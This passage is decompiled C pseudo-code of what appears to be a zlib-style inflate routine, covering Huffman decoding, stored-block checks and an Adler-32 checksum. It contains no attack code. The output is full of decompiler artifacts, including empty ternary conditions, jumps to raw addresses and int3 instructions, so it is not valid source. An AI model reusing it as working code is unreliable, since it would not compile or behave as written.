																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t968 = _t968 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t968;
																		__eflags = _t1050 - 8;
																		if(_t1050 < 8) {
																			continue;
																		} else {
																			L99:
																			_t945 =  *(_t1065 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1030 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t618 =  *(_t1030 + 0x2922) & 0x000000ff;
														 *(_t1065 - 8) = ( *(_t1030 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1030 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1065 - 8) - ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff);
														if( *(_t1065 - 8) != ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff)) {
															L265:
															 *(_t1065 - 0xc) = 0xffffffff;
															 *_t1030 = 0x27;
															goto L292;
														} else {
															L104:
															_t953 =  *(_t1065 - 8);
															while(1) {
																L105:
																__eflags = _t953;
																if(_t953 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1050;
																if(_t1050 == 0) {
																	L113:
																	_t618 =  *(_t1065 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t953;
																		if(_t953 == 0) {
																			break;
																		}
																		L116:
																		_t1016 =  *((intOrPtr*)(_t1065 - 0x40));
																		__eflags = _t618 - _t1016;
																		if(_t618 < _t1016) {
																			L118:
																			_t618 =  *(_t1065 - 0x20);
																			__eflags = _t847 - _t618;
																			if(_t847 >= _t618) {
																				L247:
																				_t1030 =  *(_t1065 - 0x14);
																				 *_t1030 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t968 = _t1016 -  *(_t1065 - 0x10);
																				_t1039 = _t618 - _t847;
																				__eflags = _t968 - _t1039;
																				_t715 =  <  ? _t968 : _t1039;
																				__eflags = ( <  ? _t968 : _t1039) - _t953;
																				if(( <  ? _t968 : _t1039) >= _t953) {
																					_t1030 = _t953;
																				} else {
																					__eflags = _t968 - _t1039;
																					_t1030 =  <  ? _t968 : _t1039;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t847 = _t847 + _t1030;
																				_t618 =  *(_t1065 - 0x10) + _t1030;
																				_t1068 = _t1068 + 0xc;
																				 *(_t1065 - 0x18) = _t847;
																				_t953 =  *(_t1065 - 8) - _t1030;
																				 *(_t1065 - 0x10) = _t618;
																				 *(_t1065 - 8) = _t953;
																				continue;
																			}
																		} else {
																			L117:
																			_t1030 =  *(_t1065 - 0x14);
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x5a1388;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1050 - 8;
																	if(_t1050 >= 8) {
																		L110:
																		_t618 = _t968 & 0x000000ff;
																		_t968 = _t968 >> 8;
																		_t1050 = _t1050 - 8;
																		 *(_t1065 - 0x28) = _t618;
																		 *(_t1065 - 4) = _t968;
																		L111:
																		__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																		_t1030 =  *(_t1065 - 0x14);
																		if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																			L246:
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																			 *( *(_t1065 - 0x10)) = _t618;
																			_t953 =  *(_t1065 - 8) - 1;
																			 *(_t1065 - 8) = _t953;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t847 -  *(_t1065 - 0x20);
																			if(_t847 >=  *(_t1065 - 0x20)) {
																				break;
																			}
																			L109:
																			_t618 = ( *_t847 & 0x000000ff) << _t1050;
																			_t847 = _t847 + 1;
																			_t968 = _t968 | _t618;
																			 *(_t1065 - 0x18) = _t847;
																			_t1050 = _t1050 + 8;
																			 *(_t1065 - 4) = _t968;
																			__eflags = _t1050 - 8;
																			if(_t1050 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1030 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L92:
															_t721 = ( *_t847 & 0x000000ff) << _t1050;
															_t1050 = _t1050 + 8;
															_t999 = _t999 | _t721;
															_t847 = _t847 + 1;
															 *(_t1065 - 0x18) = _t847;
															_t618 = _t1050 & 0x00000007;
															 *(_t1065 - 4) = _t999;
															__eflags = _t1050 - _t618;
															if(_t1050 < _t618) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1030 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L88:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t968 = _t968 | _t618;
													 *(_t1065 - 0x18) = _t847;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - 3;
													if(_t1050 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1030 = 3;
												L285:
												__eflags =  *(_t1065 + 0x18) & 0x00000002;
												L286:
												L287:
												_t628 =  !=  ? 1 : _t618;
												 *(_t1065 - 0xc) = _t628;
												__eflags = _t628 - 1;
												if(_t628 != 1) {
													L288:
													__eflags = _t628 - 0xfffffffc;
													if(_t628 != 0xfffffffc) {
														L289:
														L292:
														_t673 =  *(_t1065 - 0x3c);
														__eflags = _t847 - _t673;
														if(_t847 > _t673) {
															while(1) {
																L293:
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	goto L295;
																}
																L294:
																_t847 = _t847 - 1;
																_t1050 = _t1050 - 8;
																__eflags = _t847 - _t673;
																if(_t847 > _t673) {
																	continue;
																}
																goto L295;
															}
														}
													}
												}
											}
											goto L295;
										}
										L252:
										_t618 = _t1050 & 0x00000007;
										__eflags = _t1050 - _t618;
										if(_t1050 >= _t618) {
											L256:
											_t688 =  *(_t1065 - 0x3c);
											_t894 = _t1050 & 0x00000007;
											_t994 = _t968 >> _t894;
											_t1050 = _t1050 - _t894;
											 *(_t1065 - 4) = _t994;
											__eflags = _t847 - _t688;
											if(_t847 > _t688) {
												while(1) {
													L257:
													__eflags = _t1050 - 8;
													if(_t1050 < 8) {
														goto L259;
													}
													L258:
													_t847 = _t847 - 1;
													_t1050 = _t1050 - 8;
													__eflags = _t847 - _t688;
													if(_t847 > _t688) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t618 = _t1050;
											asm("bts edx, eax");
											__eflags = _t618 - 0x20;
											_t896 =  >=  ? _t994 : 0;
											_t995 = _t994 ^ _t896;
											__eflags = _t618 - 0x40;
											_t897 =  >=  ? _t995 : _t896;
											 *(_t1065 - 4) =  *(_t1065 - 4) & _t995 - 0x00000001;
											__eflags =  *(_t1065 + 0x18) & 0x00000001;
											if(( *(_t1065 + 0x18) & 0x00000001) == 0) {
												L290:
												_t689 = 0;
												__eflags = 0;
												 *_t1030 = 0x22;
												L291:
												 *(_t1065 - 0xc) = _t689;
												goto L292;
											} else {
												L261:
												_t898 = 0;
												while(1) {
													L277:
													 *(_t1065 - 8) = _t898;
													__eflags = _t898 - 4;
													if(_t898 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1050;
													if(_t1050 != 0) {
														L281:
														_t997 =  *(_t1065 - 4);
														__eflags = _t1050 - 8;
														if(_t1050 >= 8) {
															L275:
															_t690 = _t997 & 0x000000ff;
															_t1050 = _t1050 - 8;
															__eflags = _t1050;
															 *(_t1065 - 4) = _t997 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	break;
																}
																L273:
																_t618 = ( *_t847 & 0x000000ff) << _t1050;
																_t1050 = _t1050 + 8;
																_t997 = _t997 | _t618;
																_t847 = _t847 + 1;
																 *(_t1065 - 4) = _t997;
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	continue;
																} else {
																	L274:
																	_t898 =  *(_t1065 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1030 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t847 -  *(_t1065 - 0x20);
														if(_t847 >=  *(_t1065 - 0x20)) {
															L283:
															 *_t1030 = 0x2a;
															goto L285;
														} else {
															L280:
															_t690 =  *_t847 & 0x000000ff;
															_t847 = _t847 + 1;
															L276:
															 *(_t1065 - 0x24) = _t690;
															_t618 =  *(_t1030 + 0x10) << 0x00000008 |  *(_t1065 - 0x24);
															_t898 = _t898 + 1;
															__eflags = _t898;
															 *(_t1030 + 0x10) = _t618;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													break;
												}
												L255:
												_t695 = ( *_t847 & 0x000000ff) << _t1050;
												_t1050 = _t1050 + 8;
												_t968 = _t968 | _t695;
												_t847 = _t847 + 1;
												 *(_t1065 - 4) = _t968;
												_t618 = _t1050 & 0x00000007;
												__eflags = _t1050 - _t618;
												if(_t1050 < _t618) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1030 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1050 - 0xf;
									if(_t1050 < 0xf) {
										_t1021 =  *(_t847 + 1) & 0x000000ff;
										_t861 = _t1050;
										_t732 =  *_t847 & 0x000000ff;
										_t847 = _t847 + 2;
										_t1030 =  *(_t1065 - 0x14);
										 *(_t1065 - 0x18) = _t847;
										 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1021 << 0x00000008 | _t732) << _t861;
										_t1050 = _t1050 + 0x10;
										__eflags = _t1050;
										_t968 =  *(_t1065 - 4);
									}
									_t725 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
									 *(_t1065 - 0x1c) = _t725;
									__eflags = _t725;
									if(_t725 < 0) {
										L53:
										goto 0x5a1349;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t727 = _t968 >> _t861;
											_t861 = _t861 + 1;
											_t847 =  *((short*)(_t1030 + 0x960 + ((_t727 & 0x00000001) +  !_t847) * 2));
											__eflags = _t847;
										} while (_t847 < 0);
										 *(_t1065 - 0x1c) = _t847;
										_t847 =  *(_t1065 - 0x18);
									} else {
										L52:
										_t861 = _t725 >> 9;
									}
									L56:
									_t618 =  *(_t1065 - 8);
									_t1050 = _t1050 - _t861;
									_t968 = _t968 >> _t861;
									 *(_t1065 - 4) = _t968;
									 *( *(_t1065 - 0x10)) = _t618;
									_t861 =  *(_t1065 - 0x1c);
									__eflags = _t861 & 0x00000100;
									if((_t861 & 0x00000100) != 0) {
										L83:
										_t171 = _t1065 - 0x10;
										 *_t171 =  *(_t1065 - 0x10) + 1;
										__eflags =  *_t171;
										goto L84;
									} else {
										L57:
										_t730 =  *(_t1065 - 0x10);
										 *(_t730 + 1) = _t861;
										 *(_t1065 - 0x10) = _t730 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t860 =  *(_t1065 - 0x20) - _t847;
													__eflags = _t860 - 4;
													if(_t860 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t870;
											} while (_t870 == 0);
											goto 0x5a12e3;
											asm("int3");
											_t734 =  *_t740;
											 *_t1030 = _t734;
											_t1030 =  *(_t1065 - 0x14);
											__eflags = _t870 - 1;
											if(_t870 > 1) {
												L29:
												L36:
												goto 0x5a131f;
												asm("int3");
												 *(_t968 + 1) =  *((intOrPtr*)(_t734 + 1));
												_t968 =  *(_t1065 - 4);
											}
											L38:
											_t86 = _t1065 - 0x10;
											 *_t86 =  *(_t1065 - 0x10) + _t870;
											__eflags =  *_t86;
											while(1) {
												L39:
												_t860 =  *(_t1065 - 0x20) - _t847;
												__eflags = _t860 - 4;
												if(_t860 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1065 - 0x10) = _t1030;
											_t1030 =  *(_t1065 - 0x14);
											 *(_t1065 - 0xc) = _t968;
											_t968 =  *(_t1065 - 4);
											 *(_t1065 - 8) = _t870;
											__eflags = _t870;
										} while (_t870 <= 0);
										goto 0x5a130b;
										asm("int3");
										_t734 =  *_t624;
										 *_t1030 = _t734;
										_t1030 =  *(_t1065 - 0x14);
										__eflags = _t870 - 1;
										if(_t870 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							L295:
							_t972 =  *(_t1065 - 4);
							L296:
							 *(_t1030 + 4) = _t1050;
							asm("bts ecx, esi");
							__eflags = _t1050 - 0x20;
							_t630 =  >=  ? 0 : 0;
							_t874 = 0 ^ _t630;
							__eflags = _t1050 - 0x40;
							_t631 =  >=  ? _t874 : _t630;
							 *(_t1030 + 0x20) =  *(_t1065 - 0x28);
							_t974 =  *(_t1065 - 0x10) -  *(_t1065 + 0x10);
							__eflags =  *(_t1065 + 0x18) & 0x00000009;
							 *(_t1030 + 0x24) =  *(_t1065 - 8);
							 *(_t1030 + 0x28) =  *(_t1065 - 0x38);
							 *((intOrPtr*)(_t1030 + 0x3c)) =  *((intOrPtr*)(_t1065 - 0x48));
							 *(_t1030 + 0x38) = _t874 - 0x00000001 & _t972;
							 *(_t1065 - 0x10) = _t974;
							 *((intOrPtr*)( *((intOrPtr*)(_t1065 + 8)))) = _t847 -  *(_t1065 - 0x3c);
							_t851 =  *(_t1065 - 0xc);
							 *( *(_t1065 + 0x14)) = _t974;
							if(( *(_t1065 + 0x18) & 0x00000009) != 0) {
								L297:
								__eflags = _t851;
								if(_t851 >= 0) {
									L298:
									_t1052 =  *(_t1030 + 0x1c);
									_t877 = _t1052 & 0x0000ffff;
									_t641 = (0x5e6ea9af * _t974 >> 0x20 >> 0xb) * 0x15b0;
									_t1053 = _t1052 >> 0x10;
									 *(_t1065 - 0x3c) = _t1053;
									_t978 =  *(_t1065 - 0x10) - _t641;
									__eflags =  *(_t1065 - 0x10);
									 *(_t1065 - 0x34) = _t978;
									if( *(_t1065 - 0x10) != 0) {
										L299:
										_t853 = _t978;
										do {
											L300:
											_t979 = 0;
											 *(_t1065 + 0x14) = 0;
											__eflags = _t853 - 7;
											if(_t853 > 7) {
												L301:
												goto 0x5a149d;
												asm("int3");
												asm("int3");
												asm("int3");
												L302:
												_t1033 = _t1030 - _t641;
												__eflags = _t1033;
												do {
													L303:
													_t979 =  &(_t979[2]);
													_t879 = _t877 + ( *_t641 & 0x000000ff);
													_t880 = _t879 + ( *( *(_t1065 + 0x10) + 1) & 0x000000ff);
													_t881 = _t880 + ( *(2 +  *(_t1065 + 0x10)) & 0x000000ff);
													_t882 = _t881 + ( *( *(_t1065 + 0x10) + 3) & 0x000000ff);
													_t883 = _t882 + ( *( *(_t1065 + 0x10) + 4) & 0x000000ff);
													_t884 = _t883 + ( *( *(_t1065 + 0x10) + 5) & 0x000000ff);
													_t885 = _t884 + ( *( *(_t1065 + 0x10) + 6) & 0x000000ff);
													_t877 = _t885 + ( *( *(_t1065 + 0x10) + 7) & 0x000000ff);
													_t671 =  *(_t1065 + 0x10) + 8;
													_t1053 = _t1053 + _t879 + _t880 + _t881 + _t882 + _t883 + _t884 + _t885 + _t877;
													 *(_t1065 + 0x10) = _t671;
													__eflags = _t1033 + _t671 - _t853;
													_t641 =  *(_t1065 + 0x10);
												} while (_t1033 + _t671 < _t853);
												 *(_t1065 + 0x14) = _t979;
												 *(_t1065 - 0x3c) = _t1053;
											}
											L305:
											_t1030 = 0;
											 *((intOrPtr*)(_t1065 + 8)) = 0;
											__eflags = _t979 - _t853;
											if(_t979 < _t853) {
												L306:
												__eflags = _t853 - _t979 - 2;
												if(_t853 - _t979 >= 2) {
													L307:
													_t651 =  *(_t1065 + 0x14);
													_t1056 =  *(_t1065 + 0x10);
													_t854 = 0;
													_t990 = (_t853 - _t651 - 2 >> 1) + 1;
													__eflags = _t990;
													 *(_t1065 + 0x14) = _t651 + _t990 * 2;
													do {
														L308:
														_t878 = _t877 + ( *_t1056 & 0x000000ff);
														_t654 =  *(_t1056 + 1) & 0x000000ff;
														_t1030 = _t1030 + _t878;
														_t1056 = 2 + _t1056;
														_t877 = _t878 + _t654;
														_t854 = _t854 + _t877;
														_t990 = _t990 - 1;
														__eflags = _t990;
													} while (_t990 != 0);
													_t979 =  *(_t1065 + 0x14);
													 *(_t1065 + 0x10) = _t1056;
													_t1053 =  *(_t1065 - 0x3c);
													 *((intOrPtr*)(_t1065 + 8)) = _t854;
													_t853 =  *(_t1065 - 0x34);
												}
												L310:
												__eflags = _t979 - _t853;
												if(_t979 < _t853) {
													_t984 =  *(_t1065 + 0x10);
													_t877 = _t877 + ( *_t984 & 0x000000ff);
													_t1053 = _t1053 + _t877;
													_t985 =  &(_t984[1]);
													__eflags = _t985;
													 *(_t1065 + 0x10) = _t985;
												}
												L312:
												_t641 =  *((intOrPtr*)(_t1065 + 8)) + _t1030;
												_t1053 = _t1053 + _t641;
												__eflags = _t1053;
											}
											L313:
											L314:
											_t877 = _t877 + (_t641 * _t877 >> 0x20 >> 0xf) * 0xffff000f;
											_t641 = (0x80078071 * _t1053 >> 0x20 >> 0xf) * 0xffff000f;
											_t1053 = _t1053 + _t641;
											_t586 = _t1065 - 0x10;
											 *_t586 =  *(_t1065 - 0x10) - _t853;
											__eflags =  *_t586;
											_t853 = 0x15b0;
											 *(_t1065 - 0x3c) = _t1053;
											 *(_t1065 - 0x34) = 0x15b0;
										} while ( *_t586 != 0);
										goto 0x5a14c6;
										asm("int3");
									}
									L316:
									_t1055 = (_t1053 << 0x10) + _t877;
									 *(_t1030 + 0x1c) = _t1055;
									__eflags = _t851;
									if(_t851 == 0) {
										__eflags =  *(_t1065 + 0x18) & 0x00000001;
										if(( *(_t1065 + 0x18) & 0x00000001) != 0) {
											__eflags = _t1055 -  *(_t1030 + 0x10);
											_t851 =  !=  ? 0xfffffffe : _t851;
											__eflags = _t851;
										}
									}
								}
							}
							L319:
							return _t851;
							L320:
							L58:
							__eflags = _t1050 - 0xf;
							if(_t1050 >= 0xf) {
								L75:
								_t603 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t603;
								__eflags = _t603;
								if(_t603 < 0) {
									L77:
									goto 0x5a1372;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t605 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t847 =  *((short*)(_t1030 + 0x960 + ((_t605 & 0x00000001) +  !_t847) * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L76:
									_t860 = _t603 >> 9;
									_t618 = _t603 & 0x000001ff;
									 *(_t1065 - 8) = _t618;
								}
								L80:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 - 0x100;
								if(_t861 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t769 =  *(_t1065 - 0x10);
									__eflags = _t769 -  *((intOrPtr*)(_t1065 - 0x40));
									if(_t769 >=  *((intOrPtr*)(_t1065 - 0x40))) {
										L240:
										 *(_t1065 - 0xc) = 2;
										 *_t1030 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t769 = _t861;
										 *(_t1065 - 0x10) = _t769 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t860 - 2;
								if(_t860 >= 2) {
									L73:
									_t969 =  *(_t847 + 1) & 0x000000ff;
									_t625 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									_t860 = _t1050;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | _t969 << _t1050 + 0x00000008 | _t625 << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t618 = _t968 & 0x000003ff;
										_t1031 =  *((short*)(_t1030 + 0x160 + _t618 * 2));
										__eflags = _t1031;
										if(_t1031 < 0) {
											L64:
											__eflags = _t1050 - 0xa;
											if(_t1050 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1065 - 0x1c) = _t860;
												while(1) {
													L67:
													_t1031 =  *((short*)( *(_t1065 - 0x14) + 0x960 + ((_t968 >> _t860 & 0x00000001) +  !_t1031) * 2));
													_t860 =  *(_t1065 - 0x1c) + 1;
													 *(_t1065 - 0x1c) = _t860;
													__eflags = _t1031;
													if(_t1031 >= 0) {
														goto L74;
													}
													L68:
													_t618 = _t860 + 1;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1035 = _t1031 >> 9;
											__eflags = _t1035;
											if(_t1035 == 0) {
												L69:
												_t1030 =  *(_t1065 - 0x14);
												L70:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													L239:
													 *_t1030 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1050 - _t1035;
												if(_t1050 >= _t1035) {
													L74:
													_t1030 =  *(_t1065 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t860 = _t1050;
										_t675 = ( *_t847 & 0x000000ff) << _t860;
										_t847 = _t847 + 1;
										_t968 = _t968 | _t675;
										 *(_t1065 - 0x18) = _t847;
										_t1050 = _t1050 + 8;
										 *(_t1065 - 4) = _t968;
										__eflags = _t1050 - 0xf;
									} while (_t1050 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1065 - 0xc) = 0x40 + _t600 * 0xda0 + _t1030;
					memset(_t1065 - 0xd0, 0, 0x40);
					memset( *(_t1065 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1065 - 0xc) + 0x920, 0, 0x480);
					_t903 = 0;
					_t1068 = _t1068 + 0x24;
					_t1003 = _t1030 + ( *(_t1030 + 0x18) + 0xb) * 4;
					 *(_t1065 - 0x44) = _t1003;
					if( *_t1003 > 0) {
						L143:
						_t1030 =  *(_t1065 - 0xc);
						do {
							L144:
							_t845 =  *(_t903 + _t1030) & 0x000000ff;
							_t903 = _t903 + 1;
							 *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) =  *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) + 1;
						} while (_t903 <  *_t1003);
					}
					L145:
					goto 0x5a13d7;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1065 - 0x8c) = _t903;
					 *(_t1065 - 0x90) = _t903;
					 *(_t1065 - 0x2c) = _t903;
					 *(_t1065 - 0x30) = _t903;
					do {
						L147:
						_t782 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd4));
						_t905 = _t903 + _t782 + _t903 + _t782;
						_t1030 = _t1030 + _t782;
						_t783 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd0));
						 *(_t1065 - 0x30) =  *(_t1065 - 0x30) + _t783;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x90)) = _t905;
						_t784 =  *((intOrPtr*)(_t1065 + _t1003 - 0xcc));
						_t907 = _t905 + _t783 + _t905 + _t783;
						 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) + _t784;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x8c)) = _t907;
						_t903 = _t907 + _t784 + _t907 + _t784;
						 *(_t1065 + _t1003 - 0x88) = _t903;
						_t1003 = _t1003 + 0xc;
					} while (_t1003 <= 0x40);
					 *(_t1065 - 0x4c) = _t903;
					 *(_t1065 - 0x24) = _t1030;
					_t1030 =  *(_t1065 - 0x14);
					_t910 =  *(_t1065 - 0x24) +  *(_t1065 - 0x2c) +  *(_t1065 - 0x30);
					if( *(_t1065 - 0x4c) == 0x10000 || _t910 <= 1) {
						L150:
						_t787 =  *(_t1065 - 0x44);
						 *(_t1065 - 0x30) = 0xffffffff;
						 *(_t1065 - 0x4c) = 0;
						if( *_t787 > 0) {
							L151:
							_t1064 =  *(_t1065 - 0x4c);
							do {
								L152:
								L153:
								_t922 =  *(_t1064 + _t787) & 0x000000ff;
								 *(_t1065 - 0x44) = _t922;
								if(_t922 != 0) {
									L154:
									_t824 =  *(_t1065 + _t922 * 4 - 0x90);
									 *(_t1065 - 0x2c) = _t824;
									 *(_t1065 + _t922 * 4 - 0x90) = _t824 + 1;
									 *(_t1065 - 0x24) = _t922;
									if(_t922 != 0) {
										L155:
										do {
											L156:
											 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) >> 1;
											_t844 =  *(_t1065 - 0x24) - 1;
											_t1003 = _t1003 + _t1003 |  *(_t1065 - 0x2c) & 0x00000001;
											 *(_t1065 - 0x24) = _t844;
										} while (_t844 != 0);
										_t922 =  *(_t1065 - 0x44);
									}
									L158:
									if(_t922 > 0xa) {
										L164:
										_t828 =  *(_t1065 - 0xc) + 0x120 + (_t1003 & 0x000003ff) * 2;
										_t847 =  *(_t1065 - 0x30);
										 *(_t1065 - 0x44) = _t828;
										_t829 =  *_t828;
										 *(_t1065 - 0x2c) = _t829;
										__eflags = _t829;
										if(_t829 == 0) {
											 *( *(_t1065 - 0x44)) = _t847;
											_t829 = _t847;
											_t847 = _t847 - 2;
											__eflags = _t847;
											 *(_t1065 - 0x2c) = _t829;
											 *(_t1065 - 0x30) = _t847;
										}
										L166:
										_t1011 = _t1003 >> 9;
										__eflags = _t922 - 0xb;
										if(_t922 > 0xb) {
											L167:
											_t923 = _t922 + 0xfffffff5;
											__eflags = _t923;
											 *(_t1065 - 0x24) = _t923;
											_t924 =  *(_t1065 - 0x2c);
											do {
												L168:
												_t1011 = _t1011 >> 1;
												_t834 = 0x48f - _t924 - (_t1011 & 0x00000001);
												_t927 =  *( *(_t1065 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t927;
												if(_t927 != 0) {
													_t924 = _t927;
												} else {
													 *( *(_t1065 - 0xc) + _t834 * 2) = _t847;
													_t835 =  *(_t1065 - 0x30);
													_t924 = _t835;
													_t836 = _t835 - 2;
													 *(_t1065 - 0x30) = _t836;
													_t847 = _t836;
												}
												L171:
												_t361 = _t1065 - 0x24;
												 *_t361 =  *(_t1065 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1065 - 0x2c) = _t924;
											_t829 = _t924;
										}
										L173:
										_t1003 = (_t1011 >> 0x00000001 & 0x00000001) - _t829;
										__eflags = _t1003;
										 *( *(_t1065 - 0xc) + 0x91e + _t1003 * 2) = _t1064;
									} else {
										L159:
										_t841 = (_t922 << 0x00000009 | _t1064) & 0x0000ffff;
										 *(_t1065 - 0x44) = _t841;
										if(_t1003 < 0x400) {
											L160:
											goto 0x5a1401;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t842 = _t841 << _t922;
											 *(_t1065 - 0x4c) = _t842 + _t842;
											_t932 =  *(_t1065 - 0xc) + _t1003 * 2 + 0x120;
											do {
												L162:
												 *_t932 = _t1030;
												_t1003 = _t1003 + _t842;
												_t932 =  &(_t932[ *(_t1065 - 0x4c)]);
											} while (_t1003 < 0x400);
											_t1030 =  *(_t1065 - 0x14);
										}
									}
								}
								L174:
								_t787 =  *(_t1030 + 0x18);
								_t1064 = _t1064 + 1;
							} while (_t1064 <  *((intOrPtr*)(_t1030 + 0x2c + _t787 * 4)));
							goto 0x5a1417;
							asm("int3");
						}
						L176:
						if( *(_t1030 + 0x18) != 2) {
							L217:
							 *(_t1030 + 0x18) =  *(_t1030 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t911 = 0;
							while(1) {
								L178:
								_t1004 =  *(_t1065 - 4);
								while(1) {
									L179:
									 *(_t1065 - 8) = _t911;
									if(_t911 >=  *(_t1030 + 0x30) +  *(_t1030 + 0x2c)) {
										break;
									}
									L180:
									if(_t1064 >= 0xf) {
										L197:
										_t802 =  *((short*)(_t1030 + 0x1ca0 + (_t1004 & 0x000003ff) * 2));
										 *(_t1065 - 0x28) = _t802;
										if(_t802 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1065 - 0x28) =  !( *(_t1065 - 0x28));
												_t804 = _t1004 >> _t911;
												_t911 = _t911 + 1;
												_t618 =  *((short*)(_t1030 + 0x24a0 + ((_t804 & 0x00000001) +  *(_t1065 - 0x28)) * 2));
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t618;
											} while (__eflags < 0);
										} else {
											L198:
											_t911 = _t802 >> 9;
											_t618 = _t802 & 0x000001ff;
											 *(_t1065 - 0x28) = _t618;
										}
										L202:
										_t1004 = _t1004 >> _t911;
										_t1050 = _t1064 - _t911;
										 *(_t1065 - 4) = _t1004;
										 *(_t1065 - 0x1c) = _t1050;
										if(_t618 >= 0x10) {
											L204:
											if(__eflags != 0) {
												L207:
												_t912 =  *((char*)(_t618 + 0x2b0ff0));
												 *(_t1065 - 0x38) = _t912;
